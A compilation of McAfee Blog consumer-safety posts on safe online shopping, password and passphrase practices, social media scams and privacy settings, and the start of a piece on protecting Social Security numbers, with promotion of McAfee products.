    • Validate social media sellers: Shopping directly through social media platforms or unknown sellers bypasses traditional consumer safeguards. Before you buy from a social media seller, verify their legitimacy, check for customer reviews outside the platform, and use payment methods that offer dispute resolution.
    • Keep communications on-platform: Never move conversations or payments outside the marketplace platform. Scammers often try to lure buyers to external communication channels or direct payment methods to circumvent buyer protections. Legitimate sellers understand that platform policies protect both parties and will keep all interactions within the official channels.
    • Do not use a public computer or Wi-Fi when shopping online: Strangers may be able to access your browsing history and even your login information on shared devices or over unsecured public Wi-Fi. To protect yourself, do all of your online shopping from your home computer or your personal mobile device.
    • Make sure you have a clean computer or mobile device: Make sure you have up-to-date security software on all your devices to safeguard your privacy, protect against identity theft, and defend against viruses and online threats.
    • Keep a paper trail: Take a screenshot of product listings and advertisements before purchasing. Keep a copy of your order number and receipt, and note which credit card you used. When you receive your credit card statement, review it to make sure that the charge on your card is correct, with no extra fees.

    The FTC also recommends these additional tips so you can enjoy all the advantages that online shopping has to offer and prevent risking your personal information.

    Immediate steps to take if you ordered from a fake online store

    1. Contact your credit card issuer immediately: Call the customer service number on the back of your card once you realize you’ve been scammed. Request a chargeback and explain that you received counterfeit goods, nothing at all, or that the merchant was fraudulent. You usually have 60 days from your statement date to dispute charges, but acting quickly improves your chances of a successful resolution.
    2. Freeze or replace your payment card: Contact your bank or card issuer to freeze your current card and request a new account to prevent more unauthorized charges. If you used a debit card, this step is especially critical since debit card fraud protections are more limited than credit cards.
    3. Change your passwords and enable two-factor authentication: If you created an account on the fake website, change your password immediately on your real account and any linked accounts such as email, banking, and social media. Enable two-factor authentication and think about using a password manager to generate and store unique passwords for each account.
    4. Report the fraudulent seller to the platform or hosting service: Protect other consumers by reporting the fake store. If the site appeared in search results or social media ads, report it to those platforms. You can also report fraudulent websites to their hosting companies to take down fraudulent sites once notified.
    5. File reports with federal and state authorities: Report the scam to the Federal Trade Commission (FTC) and the Internet Crime Complaint Center (IC3) to help authorities track scam trends and assist in investigations. Additionally, contact your state’s attorney general office, as many have consumer protection divisions that handle online fraud.
    6. Save and organize all evidence: Document everything related to your purchase in both digital and printed formats: screenshots of the website, confirmation emails, receipts, payment records, and any communication with the seller. Save copies of your credit card or bank statements showing the charge. These documents are essential for your chargeback dispute and law enforcement investigations.
    7. Monitor your credit report and identity closely: Keep a close eye on your bank and credit card statements, as well as credit reports from all three major bureaus—Experian, Equifax, and TransUnion—for suspicious activity, and place a fraud alert or credit freeze on your accounts if you’re concerned about identity theft.
    8. Follow up on your chargeback and dispute process: Stay in regular contact with your credit card company about your dispute and provide additional documents promptly if requested. Be patient and persistent as the investigation process could take up to 90 days.

    Final thoughts

    Online shopping should feel exciting, not a dangerous undertaking you have to brace for, especially during the season of giving. It can be, with a few simple steps—checking the URL, looking for HTTPS, verifying the seller, paying with a credit card or virtual number, and trusting your gut when something feels suspicious. These small habits will keep your money and your identity where they belong: with you.

    For increased safety while shopping online, seek out the help of a trusted security solution such as McAfee+ that will alert you of risky links and compromised websites to prevent identity theft or malware infection.

    If this guide helps you, pass it along to someone you care about. Scams don’t just target individuals—they cascade into families and friend groups. The more we normalize safe shopping habits and increase our vigilance, the harder it is for fraudsters to win. If you ever feel unsure mid-purchase, take a breath and double-check. A few extra seconds now can save you a lot of stress later. Stay safe, and happy shopping!

    The post Helpful Tips for Safe Online Shopping appeared first on McAfee Blog.

    15 Vital Tips To Better Password Security

    By: McAfee
    better password security

    Even as passkeys and biometric sign-ins become more common, nearly every service still relies on a password somewhere in the process—email, banking, social media, health portals, streaming, work accounts, and device logins.

    Most people, however, don’t realize the many ways we make our accounts vulnerable due to weak passwords, enabling hackers to easily crack them. In truth, password security isn’t complicated once you understand what attackers do and what habits stop them.

    In this guide, we will look into the common mistakes we make in creating passwords and offer tips on how you can improve your password security. With a few practical changes, you can make your accounts dramatically harder to compromise.

    Password security basics

    Modern password strength comes down to three truths. First, length matters more than complexity. Every extra character multiplies the number of guesses an attacker must make. Second, unpredictability matters because attack tools prioritize the most expected human choices first. Third, usability matters because rules that are painful to follow lead to workarounds like reuse, tiny variations, or storing written passwords in unsafe ways. Strong password security is a system you can sustain, not a heroic one-time effort.

    Protection that strong passwords provide

    Strong passwords serve as digital barriers that are more difficult for attackers to compromise. Mathematically, password strength works in your favor when you choose well. A password containing 12 characters with a mix of uppercase letters, lowercase letters, numbers, and symbols creates over 95 trillion possible combinations. Even with advanced computing power, testing all these combinations requires substantial time and resources that most attackers prefer to invest in easier targets.

    This protection multiplies when you use a unique password for each account. Instead of one compromised password providing access to multiple services, attackers must overcome several independent security challenges, dramatically reducing your overall risk profile.

    Benefits of good password habits

    Developing strong password security habits offers benefits beyond protecting your accounts. These habits contribute to your overall digital security posture and create positive momentum for other security improvements, such as:

    • Reduced attack success: Strong, unique passwords make you a less attractive target for cybercriminals who prefer easier opportunities.
    • Faster recovery: When security incidents do occur, good password practices limit the scope of damage and accelerate recovery.
    • Peace of mind: Knowing your accounts are well-protected reduces anxiety about potential security threats.
    • Professional credibility: Good security habits demonstrate responsibility and competence in professional settings.
    • Family protection: Your security practices often protect family members who share devices or accounts.

    The impact of weak passwords

    On the other hand, weak passwords are not just a mild inconvenience. They enable account takeovers and identity theft, and can become the master key to your other accounts. Here’s a closer look at the consequences:

    Your digital identity becomes someone else’s

    Account takeover happens when cybercriminals gain unauthorized access to your online accounts using compromised credentials. They could impersonate you across your entire digital presence, from email to social media. For instance, they can send malicious messages to your contacts, make unauthorized purchases, and change your account recovery information to lock you out permanently.

    The effects of an account takeover can persist for years. You may discover that attackers used your accounts to create new accounts in your name, resulting in damaged relationships and credit scores, contaminated medical records, employment difficulties, and legal complications with law enforcement.

    The immediate and hidden costs of financial loss

    Financial losses from password-related breaches aren’t limited to money stolen from your accounts. Additional costs often include:

    • Bank penalty fees from overdrawn accounts
    • Needing to hire credit monitoring services to prevent future fraud
    • Legal fees for professional help resolving complex cases
    • Lost income from time spent dealing with fraud resolution
    • Higher insurance premiums due to damaged credit

    The stress and time required to resolve these issues also affect your overall well-being and productivity.

    Your personal life becomes public

    Your passwords also guard your personal communications, private photos, confidential documents, and intimate details about your life. When these barriers fail, you could find your personal photos and messages shared without consent, confidential business information in competitors’ hands. The psychological, emotional, and professional impact of violated trust can persist long after the immediate crisis passes.

    15 tips for better password security: Small steps, big impact

    You can dramatically improve your password security with relatively small changes. No need to invest in expensive or highly technical tools to substantially improve your security. Here are some simple tips for better password security:

    1) Long passwords are better than short, “complex” passwords

    If you take away only one insight from this article, let it be this: password length is your biggest advantage. A long password creates a search effort that brute force tools will take a long time to finish. Instead of trying to remember short strings packed with symbols, use passphrases made of several unrelated words. Something like “candle-river-planet-tiger-47” is both easy to recall and extremely hard to crack. For most accounts, 12–16 characters is a solid minimum; for critical accounts, longer is even better.

    2) Never reuse passwords

    Password reuse is the reason credential stuffing works. When one site is breached, attackers immediately test those leaked credentials on other services. If you reuse those credentials, you have effectively given the keys to your kingdom. Unique passwords can block that entry. Even if a shopping site leaks your password, your email and banking stay protected because their passwords are different.

    3) Don’t use your personal information

    Attackers always try the obvious human choices first: names, birthdays, pets, favorite teams, cities, schools, and anything else that could be pulled from social media or public records. Even combinations that feel “creative,” such as a pet name plus a year, tend to be predictable to cracking tools. Your password should be unrelated to your life.

    4) Avoid patterns and common substitutions

    In the past, security experts encouraged people to replace letters with symbols such as turning “password” into “P@ssw0rd” and calling it secure. That advice no longer holds today, as attack tools catch these patterns instantly. The same goes for keyboard walks (qwerty, asdfgh), obvious sequences (123456), and small variations like “MyPassword1” and “MyPassword2.” If your password pattern makes sense to a human, a modern cracking tool will decipher it in seconds.

    5) Use a randomness method you trust

    Humans think they’re random, but they aren’t. We pick symbols and words that look good together, follow habits, and reuse mental templates. Two reliable ways to break that habit are using Diceware—an online dice-rolling tool that selects words from a list—and password generators, which create randomness better than your human brain. In addition, the variety of characters in your password impacts its strength. Using only lowercase letters gives you 26 possible characters per position, while combining uppercase, lowercase, numbers, and symbols expands this to over 90 possibilities.

    6) Match password strength to account importance

    Not every account needs the same level of complexity, but every account needs to be better than weak. For email, banking, and work systems, use longer passphrases or manager-generated passwords of 20 characters or more. For daily convenience accounts such as shopping or social media, a slightly shorter but still unique passphrase is fine. For low-stakes logins you rarely use, still keep at least a 12-character unique password. This keeps your accounts secure without being mentally exhausting.

    7) Turn on multi-factor authentication where possible

    Multi-factor authentication (MFA) adds a second checkpoint in your security, stopping most account takeovers even if your password leaks. Authenticator apps are stronger than SMS codes, which can be intercepted in SIM-swap attacks. Hardware or physical security keys are even stronger. Start with your email and financial accounts, then expand to everything that offers MFA.

    8) Learn to spot phishing scams to prevent stolen passwords

    A perfect password is useless if you type it into the wrong place. Phishing attacks work by imitating legitimate login pages or sending urgent messages that push you to click. Build the habit of checking URLs in unsolicited emails or texts, being wary of pressure tactics, and taking a moment to question the message. When in doubt, open a fresh tab and navigate to the service directly.

    9) Avoid signing in on shared devices

    You may not know it, but shared computers may carry keyloggers, unsafe browser extensions, or saved sessions from other users. If you have no choice but to sign in using a shared device, don’t allow the browser to save your log-in details, log out fully afterward, and change the password later from your own device.

    10) Be careful with public Wi-Fi

    On public networks in places like such as cafes or airports, cybercriminals could be prowling for their next victim. Attackers sometimes create fake hotspots with familiar names to trick people into connecting. Even on real public Wi-Fi, traffic can be intercepted. The safest choice is to avoid logging into sensitive accounts on public networks. If you must use public Wi-Fi, protect yourself by using a reputable virtual private network and verify the site uses HTTPS.

    11) Ensure your devices, apps, and security tools are updated

    Many password thefts happen as a result of compromised devices and software. Outdated operating systems and browsers can contain security vulnerabilities known to hackers, leading to malware invasion, session hijacking, or credential harvesting. The best recourse is to set up automatic updates for your OS, browser, and antivirus tool to remove a huge chunk of risk with no additional effort from you.

    12) Use a reputable password manager

    Password managers solve two hard problems at once: creating strong unique passwords and remembering them. They store credentials in an encrypted vault protected by a master password, generate high-entropy passwords automatically, and often autofill only on legitimate sites (which also helps against phishing). In practice, password managers are what make “unique passwords everywhere” feasible.

    13) Protect your password manager like it’s your digital vault

    Among all others, your master password that opens your password manager is the one credential you must memorize. Make it long, passphrase-style, and make sure you have never reused it anywhere else. Then add MFA to the manager itself. This makes it extremely difficult for someone to get into your vault even if they somehow learn your master password.

    14) Audit and update passwords when there’s a reason

    The old “change every 90 days no matter what” guideline could backfire, leading to password-creation fatigue and encouraging people to make only tiny predictable tweaks. A smarter approach is to update only when something changes in your risk: a breach, a suspicious login alert, or a health warning from your password manager. For critical accounts, doing a yearly review is a reasonable rhythm.

    15) Reduce your attack surface by cleaning up old accounts

    Unused accounts are easy to forget and easy to compromise. Delete services you don’t use anymore, and review which third-party apps are connected to your Google, Apple, Microsoft, or social logins. Each unnecessary connection is another doorway you don’t need open.

    Practical implementation strategies for passphrases

    As mentioned in the tips above, passphrases have become the better, more secure alternative to traditional passwords. A passphrase is essentially a long password made up of multiple words, forming a phrase or sentence that’s meaningful to you but not easily guessed by others.

    Attackers use sophisticated programs that can guess billions of predictable password combinations per second using common passwords, dictionary words, and patterns. But when you string together four random words, you create over 1.7 trillion possible combinations, even though the vocabulary base contains only 2,000 common words.

    Your brain, meanwhile, is great at remembering stories and images. When you think “Coffee Bicycle Mountain 47,” you might imagine riding your bike up a mountain with your morning coffee, stopping at mile marker 47. That mental image sticks with you in ways that “K7#mQ9$x” never could.

    The approach blending unpredictability and the human ability to remember stories offers the ideal combination of security and usability.

    To help you create more effective passphrases, here are a few principles you can follow:

    • Use unrelated words: Choose words that don’t naturally go together. “Sunset beach volleyball Thursday” is more predictable than “elephant tumbler stapler running” because the first phrase contains related concepts.
    • Add personal meaning: While the words shouldn’t be personally identifiable, you can create a mental story or image that helps you remember them. This personal connection makes the passphrase memorable without making it guessable.
    • Avoid quotes and common phrases: Don’t use song lyrics, movie quotes, or famous sayings. These appear in dictionaries and can be vulnerable to specialized attacks.
    • The sentence method: Create a memorable sentence and use the first letter of each word, plus some numbers or punctuation. “I graduated from college in 2010 with a 3.8 GPA!” becomes “IgfCi2010wa3.8GPA!” This method naturally creates long, unique passwords.
    • The story method: Create a memorable short story using random elements and turn it into a passphrase. “The purple elephant drove a motorcycle to the library on Tuesday” becomes “PurpleElephantMotorcycleLibraryTuesday” or can be used as-is with spaces.
    • The combination method: Combine a strong base passphrase with site-specific elements. For example, if your base is “CoffeeShopRainbowUnicorn,” you might add “Amazon” for your Amazon account: “CoffeeShopRainbowUnicornAmazon.”
    • Use mixed case: For maximum security, the mixed-case approach capitalizes on random letters within words: “coFfee biCycLe mouNtain 47.” This dramatically increases entropy while remaining typeable.
    • Add symbols: When used sparingly, this technique adds complexity. You can separate the words or substitute some letters with random symbols. But make sure you will remember them.
    • Use words from other languages: Multi-language passphrases offer a layer of security, assuming you’re comfortable with multiple languages. “Coffee Bicicleta Mountain Vier” combines English, Spanish, and German words, creating combinations that appear in no standard dictionary.
    • Personalize it: For the security-conscious, consider adding random elements that hold personal meaning, as long as this information isn’t publicly available. It could be the coordinates of a special place or a funny inside story within your family.

    Password managers: Your password vault

    Password managers are encrypted digital vaults that store all your login credentials behind a single master password. They are your personal security assistant that never forgets, never sleeps, and constantly works to keep your accounts protected with unique, complex passwords.

    Modern password managers create passwords that are truly random, combining uppercase and lowercase letters, numbers, and special characters in patterns that are virtually impossible for cybercriminals to guess or crack through brute force attacks. These passwords typically range from 12 to 64 characters long, exceeding what most people could realistically remember or type consistently.

    Encryption scrambles your passwords

    The encrypted format scrambles your passwords using advanced cryptographic algorithms before being saved. This means that even if someone gained access to your password manager’s servers, your actual passwords would appear as meaningless strings of random characters without the encryption key. Only you possess this key through your master password.

    The auto-fill functionality also offers convenience, recognizing the login page of your account and instantly filling in your username and password with a single click or keystroke. This seamless process happens across operating systems, browsers, and devices—your computer, smartphone, and tablet—keeping your credentials synchronized and accessible wherever you need them.

    Choose a reputable password manager

    Selecting the right password manager requires careful consideration of several factors that directly impact your security and user experience.

    The reputation and track record of the company offering the password manager should be your first consideration. Look for companies that have been operating in the security space for several years and have a transparent approach to security practices.

    Reputable companies regularly undergo independent security audits by third-party cybersecurity firms to examine the password manager’s code, encryption methods, and overall security architecture. Companies that publish these audit results demonstrate transparency and commitment to security.

    Also consider password managers that use AES-256 encryption, currently the gold standard for data protection used by government agencies and financial institutions worldwide. Additionally, ensure the password manager employs zero-knowledge architecture, meaning the company cannot access your passwords even if they wanted to.

    Intuitive user interface, reliable auto-fill functionality, responsive customer support, and ease of use should be checked as well. A password manager that is confusing to navigate or constantly malfunctions will likely be abandoned, defeating the purpose of improved password security.

    Choose a solution that offers other features aside from the basic password storage. Modern password managers often include secure note storage for sensitive information such as Social Security numbers, passport details, password sharing capabilities for family accounts, and dark web monitoring that alerts you if your credentials appear in data breaches.

    Final thoughts

    Strong password security doesn’t have to be complicated. Small changes you make today can dramatically improve your digital security. By creating unique, lengthy passwords or passphrases for each account and enabling multi-factor authentication on your most important services, you’re taking control of your online safety.

    Consider adopting a reputable password manager to simplify the process while maximizing your protection. It’s one of the smartest investments you can make for your digital security.

    The post 15 Vital Tips To Better Password Security appeared first on McAfee Blog.

    15 Critical Tips to Stay Safe on Social Media

    By: McAfee
    woman checking her social media on mobile

    Social media platforms connect you to thousands of people worldwide. But while these platforms offer incredible opportunities for bonding, learning, and entertainment, they also present personal security challenges. Navigating them safely requires being aware of risks and proactively protecting your accounts.

    The three most common risks you’ll encounter are privacy exposure, account takeover, and scams. Privacy exposure occurs when your personal information becomes visible to unintended audiences, potentially leading to identity theft, stalking, or professional damage. You have control over your social media security. By implementing safe social media practices, you can dramatically reduce your risk exposure.

    This guide rounds up 15 practical, everyday tips to help you secure your accounts and use them more safely. It covers smart posting habits, safer clicking and app-permission choices, stronger privacy settings, and core security basics like using updated browsers, reliable protection tools, and identity-theft safeguards—so you can enjoy social media without making yourself an easy target.

    Before we dive in, we want to remind you first that our strongest recommendation amid anything and everything unsolicited, unusual, or suspicious on social media is this: verify, verify, verify through separate communication channels such as phone, email, and official websites.

    15 top tips to stay safer on social media

    1. Realize that you can become a victim at any time.

    Not a day goes by when we don’t hear about a new hack. With 450,000 new pieces of malware released to the internet every day, security never sleeps. For your increased awareness, here’s a short list of the most common social media scams:

    • Giveaway and lottery scams: Fake contests promising expensive prizes like iPhones, gift cards, or cash in exchange for personal information or payment of “processing fees” before you can claim your prize.
    • Impersonation scams: Criminals create fake profiles mimicking friends, family members, celebrities, or trusted organizations to build false relationships and extract money or information from you. One warning sign is that the direct message, link, or post will originate from accounts with limited posting history or generic profile photos.
    • Romance scams: Fraudsters develop fake romantic relationships on social platforms over time, eventually requesting money for emergencies, travel, or other fabricated situations. Never send money to someone you’ve only met online and use reverse image searches to verify profile photos aren’t stolen.
    • Fake job offers: Scammers will post attractive employment opportunities, promising unrealistic salaries for minimal work. During your “onboarding,” the fake HR person will require upfront payments for equipment, training, or background checks, or use job interviews to harvest personal information such as Social Security numbers.
    • Cryptocurrency and investment scams: Fraudulent investment schemes promise guaranteed returns through cryptocurrency trading, forex, or other financial opportunities, often using fake testimonials and urgent time pressure. The fraudsters will promise guaranteed high returns, pressure you to invest quickly, and ask you to recruit friends and family into the “opportunity.”
    • Charity and disaster relief scams: Fake charitable organizations exploit current events, natural disasters, or humanitarian crises to solicit donations that never reach legitimate causes. They will pressure you for immediate donations, offer vague descriptions about how funds will be used, and request cash, gift cards, or cryptocurrency payments.
    • Shopping and marketplace spoofing: Phony online stores or marketplace sellers advertise products at suspiciously low prices, then collect payment but will never deliver the goods. If they do, it will likely be counterfeit. Be on guard for prices that are way below market value, poorly presented websites or badly written advertisements, pressure tactics, and limited payment options.

    2. Think before you post.

    Social media is quite engaging, with all the funny status updates, photos, and comments. However, all these bits of information can reveal more about you than you intended to disclose. The examples below might be extreme, but they are real-world scenarios that continue to happen to real people daily on social media:

    • Social engineering attacks: When you post details about your daily routine, workplace, or family members, scammers can use this information to build trust and manipulate you into revealing more sensitive information. Limit sharing specific details about your schedule and locations.
    • Employment and reputation damage: Potential employers increasingly review social media profiles during hiring processes, and controversial opinions, inappropriate content, or unprofessional behavior can eliminate your chances of being hired for job opportunities or damage your professional reputation. Similarly, personal relationships may be strained when private information is shared publicly or when posts reveal information that others expected to remain confidential.
    • Financial scams and fraud: Sharing details about expensive purchases, vacations, or financial situations makes you a target for scammers who craft personalized fraud attempts. Apply safe social media practices by avoiding posts about money, luxury items, or financial struggles that could attract unwanted attention from fraudsters.

    3. Nothing good comes from filling out a “25 Most Amazing Things About You” survey.

    Oversharing on social media creates significant risks that extend beyond embarrassment or regret. Identity thieves actively monitor social platforms for personal information they can use to answer security questions, predict passwords, or impersonate you in social engineering attacks.

    Avoid publicly answering questionnaires with details like your middle name, as this is the type of information financial institutions—and identity thieves—may use to verify your identity.

    • Password reset clues: Sharing your birth date, hometown, or pet’s name gives cybercriminals the answers to common security questions used in password resets. Do your best to keep personal details private and use unique, unguessable answers for security questions that only you would know.
    • Identity theft: Oversharing personal information such as your full name, address, phone number, and family details gives identity thieves the building blocks to impersonate you or open accounts in your name. In addition, these details frequently serve as backup authentication methods for your email or bank accounts. You wouldn’t want identity thieves to know them, then. Protect your accounts by tightening privacy settings and limiting the information in your profile and posts.
    • Doxxing: This publication of your private information without consent is another malicious consequence of oversharing. Your seemingly harmless social media posts can be combined with other public records to reveal your home address, workplace information, and family details, which can then be used to harass, intimidate, or endanger you and your loved ones as part of a scam or revenge scheme.
    • Data collection: The scope of data collection and its potential for misuse continues to evolve. Anything you share on social media becomes data for hundreds of third-party companies for advertising and analytics purposes that you may not realize. This widespread distribution of your personal information increases the odds that your data will be involved in a breach or used in nefarious ways.

    4. Think twice about applications that request permission to access your data.

    Third-party apps with excessive permissions can access your personal data, post to social media at any time on your behalf, or serve as entry points for attackers, regardless of whether you’re using the application. To limit app access and reduce your attack surface significantly, review all apps and services connected to your social media accounts. Revoke permissions to applications you no longer use or don’t remember authorizing.

    5. Don’t click on short links that don’t clearly show the link location.

    Shortened links can be exploited in social media phishing attacks as they hide the final destination URL, making it difficult for you to determine where it actually leads. These tactics mimic legitimate communications from trusted sources and come in the form of direct messages, comments, sponsored posts, and fake verification alerts, all in an effort to steal your personal information, login credentials, or financial details. Often, these attacks appear as urgent messages claiming your account will be suspended or fake prize notifications.

    When you identify phishing attempts, immediately report and block the suspicious accounts using the platform’s built-in reporting features. This will protect not only you but other users on the platform.

    If the link is posted by a product seller or service provider, it is a good idea to:

    1. Verify the link independently: Don’t click suspicious links or download files from unknown sources. Instead, navigate to official websites directly by typing the URL yourself or using trusted search engines.
    2. Verify the profile before engaging: Look for verified checkmarks, consistent posting history spanning several months or years, and mutual connections. As scammers often use stolen photos, check if the photo appears elsewhere online by doing a reverse image search.
    3. Use only trusted payment methods: Stick to secure payment platforms with buyer protection such as PayPal, credit cards, or official app payment systems. Never send money through wire transfers, gift cards, cryptocurrency, or peer-to-peer payment apps to strangers, as these transactions are irreversible and untraceable.
    4. Research sellers and causes thoroughly: Before making any purchase or donation, search for the business name online, check reviews on multiple sites, and verify charity registration numbers through official databases. Look up the organization’s official website and ensure that the business has verifiable contact information, a physical address, and good reviews.
    5. Keep conversations on the platform: Legitimate sellers and organizations rarely need to move discussions to private messaging apps, email, or phone calls immediately. When scammers push you off-platform, they’re avoiding security measures and community reporting systems.

    6. Beware of posts with subjects along the lines of, “LOL! Look at the video I found of you!”

    You might think the video or link relates directly to you. But when you click it, you get a message saying that you need to upgrade your video player in order to see the clip. When you attempt to download the “upgrade,” the malicious page will instead install malware that tracks and steals your data. As mentioned, don’t click suspicious links or download files from unknown sources before verifying independently. Visit the official websites by directly typing the URL yourself or using trusted search engines.

    This also brings us to the related topic of being tagged on other people’s content. If you don’t want certain content to be associated with you, adjust the settings that enable you to review posts and photos before they appear on your profile. This allows you to maintain control over your digital presence and prevents embarrassing or inappropriate content associations.

    7. Be suspicious of anything that sounds unusual or feels odd.

    If one of your friends posts, “We’re stuck in Cambodia and need money,” keep your radar up as it’s most likely a scam. It is possible that a scammer has taken over your friend’s account, and is using it to impersonate them, spread malicious content, or extract sensitive information from their contacts, including you. Don’t engage with this post or the fraudster, otherwise the next account takeover could be yours.

    In this kind of scam, some critical areas of your life are affected:

    • Financially, successful attacks can result in unauthorized purchases, drained bank accounts, or damaged credit scores through identity theft.
    • Your reputation faces threats from impersonation, where attackers post harmful content under your name, or from oversharing personal information that employers, colleagues, or family members might frown upon.
    • In terms of misusing your identity, criminals could further exploit your social media profile by collecting data from your posts to conduct other fraudulent activities, from opening accounts in your name to bypassing security questions on other services.

    When you encounter suspicious activity, always use official support pages rather than responding to questionable messages. Major social media platforms provide dedicated help centers and verified contact methods.

    • Configure message and comment filtering: Set up keyword filters to automatically block suspicious messages and enable message request filtering from unknown users. This helps you verify suspicious messages on social media before they reach your main inbox.
    • Watch for urgency and pressure tactics: Scammers create false urgency through “limited time offers” or “emergency situations” to prevent you from thinking clearly. Legitimate opportunities and genuine emergencies allow time for verification.

    8. Understand your privacy settings.

    Select the most secure options and check periodically for changes that can open up your profile to the public. Depending on your preference and the privacy level you are comfortable with, you can choose from these options:

    • Public profiles make your content searchable and accessible to anyone, including potential employers, strangers, and data collectors. This setting maximizes your visibility and networking potential but also increases your exposure to unwanted contact and data harvesting.
    • Friends-only profiles limit your content to approved connections, balancing your social interaction and privacy protection. This setting, however, doesn’t prevent your approved friends from reposting your content or protect you from data collection.
    • Private profiles provide the highest level of content protection, requiring approval for anyone to see your posts. While this setting offers maximum control over your audience, it can limit legitimate networking opportunities and may not protect you from all forms of data collection.

    We suggest that you review your privacy settings every three months, as platforms frequently update their policies and default settings. While you are at it, take the opportunity to audit your friend lists and remove inactive or suspicious accounts.

    9. Reconsider broadcasting your location.

    Posting real-time locations or check-ins can alert potential stalkers to your whereabouts and routine patterns, while geo-tagged photos can reveal where you live, study, work, shop, or work out. Location sharing creates patterns that criminals can exploit for security threats such as stalking, harassment, and other physical crimes.

    To avoid informing scammers of your whereabouts, turn off location tagging in your social media apps and avoid posting about your routine. You might also consider disabling “last seen” or “active now” indicators that show when you’re online. This prevents others from monitoring your social media activity patterns and reduces unwanted contact attempts, significantly improving your personal and family safety while maintaining your ability to share experiences.

    10. Use an updated browser, social media app, and devices.

    Older browsers tend to have more security flaws and often don’t recognize newer scam patterns, while updated versions are crucial for security by patching vulnerabilities. Updates add or improve privacy controls such as tracking prevention, cookie partitioning, third-party cookie blocking, stronger HTTPS enforcement, transparent permission prompts. They also support newer HTML/CSS/JavaScript features, video and audio codecs, payment and login standards, and accessibility features.

    In terms of performance, new browser versions offer faster performance, better memory management, and more efficient rendering, so you get fewer freezes, less fan noise, and longer battery life and better extension compatibility.

    11. Choose unique logins and passwords for each of the websites you use.

    Consider using password managers, which can create and store secure passwords for you. Never reuse passwords across platforms. This practice ensures that if one account is compromised, your other accounts remain secure. Password managers also help you monitor for breached credentials and update passwords regularly.

    In addition, implement multi-factor authentication (MFA)on every social media account using authenticator apps. This single step can protect social media accounts from 99% of automated attacks. MFA enforcement should be non-negotiable for both personal and business accounts, as it adds critical security that makes account takeovers exponentially more difficult.

    12. Check the domain to be sure that you’re logging into a legitimate website.

    Scammers build fake login pages that look identical to real ones. The only obvious difference is usually the domain. They want you to type your username/password into their site, so they can steal it. So if you’re visiting a Facebook page, make sure you look for the https://www.facebook.com address.

    The rule is to read the domain from right to left because the real domain is usually the last two meaningful segments before the slash. For instance, https://security.facebook.com—read from right to left—is legitimate because the main domain is facebook.com, and “security” is just a subdomain.

    Watch out for scam patterns such as:

    • Look-alike domains such as faceboook.com (extra “o”), facebook-login.com, fb-support.com.
    • Subdomain tricks that hide the real domain such as https://facebook.com.login-security-check.ru.

    13. Be cautious of anything that requires an additional login.

    Within the social media platform, scammers often insert a “second” sign-in step to capture your credentials. A common trick is sending you to a page that looks like a normal email, business, or bank website but then suddenly asks you to log in again “to continue,” “to verify your identity,” or “because your session expired.” That extra login prompt is frequently a fake overlay or a malicious look-alike page designed to steal passwords.

    Clicking a shared document link, viewing a receipt, or checking a delivery status usually shouldn’t require you to re-enter your email and password—especially if you’re already signed in elsewhere. Another example is a fake security notification claiming your account has been compromised, directing you to another page or website that requires a new login. Attackers usually rely on urgency, panic, and habit; you might be so used to logging in all the time, that you could do it automatically without noticing the context is wrong.

    A safer habit is to stop and reset the flow. If something unexpectedly asks for another login, don’t use the embedded prompt. Instead, open a new tab, type the site’s official address yourself, check account status, and log in there if needed. If the request was legitimate, it will still work once you’re signed in through the official site; if it was a trap, you’ve just avoided handing over your credentials.

    14. Make sure your security suite is up to date.

    Your suite should include an antivirus, anti-spyware, anti-spam, a firewall, and a website safety advisor. Keeping your security suite up to date is essential as threats evolve daily, and outdated protection can miss new malware, phishing kits, ransomware variants, and scam techniques. Updates also patch security weaknesses in the software itself, improve detection technologies, and add protections for newer attack methods.

    The McAfee Social Privacy Manager extends “security updates” beyond your device and into your social media footprint by scanning your privacy settings across supported platforms, flagging exposures, and recommending safer configurations. Because social platforms frequently change their settings and defaults, Social Privacy Manager also needs to stay updated to recognize and apply the right privacy protections.

    15. Invest in identity theft protection.

    Regardless of how careful you may be or any security systems you put in place, there is always a chance that you can be compromised in some way. It’s nice to have identity theft protection watching your back.

    McAfee+ combines every day device security with identity monitoring in one suite. Depending on the plan, McAfee+ can watch for your personal info on the dark web and breach databases, monitor financial and credit activity, and send real-time alerts for anomalies. The Advanced and Ultimate plans add wider support such as credit monitoring and tracking for bank or investment accounts, as well as tools that reduce your exposure such as Personal Data Cleanup that removes your info from data broker sites. It doesn’t just warn you after a breach; it helps shrink the chances your data gets misused in the first place.

    Final thoughts

    Social media brings incredible opportunities, but privacy exposure, scams, and account takeovers remain real challenges that can impact your finances, reputation, and personal security. The tips outlined above give you practical ways to recognize the risks and protect your social media accounts. By raising your level of awareness and applying safe social media practices, you are building a stronger defense against evolving threats.

    Make security a family affair by sharing these safe social media practices with everyone in your household—especially children and teens who use social media—so they can enjoy a safer experience.

    The post 15 Critical Tips to Stay Safe on Social Media appeared first on McAfee Blog.

    Smart Ways to Keep Your Social Security Number from Being Cracked

    By: McAfee

    A determined cybercriminal can find ways to guess or predict an individual’s Social Security number, which increases the risk of identity theft for all of us.

    In 2009, researchers from Carnegie Mellon University revealed that a reliable method for predicting Social Security numbers was discovered using information from social networking sites, data brokers, voter registration lists, online white pages, and the publicly available Social Security Administration’s Death Master File.

    Originally, the first three numbers on a Social Security card represented the state in which a person had initially applied for their card. Numbers started in the Northeast and moved westward. This meant that people born on the East Coast were assigned the lowest numbers and those born on the West Coast were assigned the highest numbers. Before 1986, people were rarely assigned a Social Security number until age 14 or so, since the numbers were used for income tracking purposes.

    The Carnegie Mellon research

    The Carnegie Mellon researchers were able to guess the first five digits of a Social Security number on their first attempt for 44% of people born after 1988. For those in less populated states, the researchers had a 90% success rate. In fewer than 1,000 attempts, the researchers could identify a complete Social Security number, “making SSNs akin to 3-digit financial PINs.” The researchers concluded, “Unless mitigating strategies are implemented, the predictability of SSNs exposes people born after 1988 to risks of identity theft on mass scales.”

    To address this security gap, the Social Security Administration in 2011 changed the way SSNs are issued by randomizing number assignment to make predicting patterns more difficult. While this is certainly an accomplishment, the potential to predict Social Security numbers is the least of our problems. Social Security numbers can be found in unprotected file cabinets and databases in thousands of government offices, corporations, and educational institutions, exposing people to identity theft and other related risks. With the growing losses from all identity theft cases, protecting SSNs is a serious concern.

    Your SSN: It’s more than a string of numbers

    Your Social Security number might be only nine digits, but in the wrong hands, it can act like a master key that unlocks far more. It can reveal details about your life, serving as a powerful linking tool for cybercriminals to access or verify other personal details and build a more comprehensive profile of your identity.

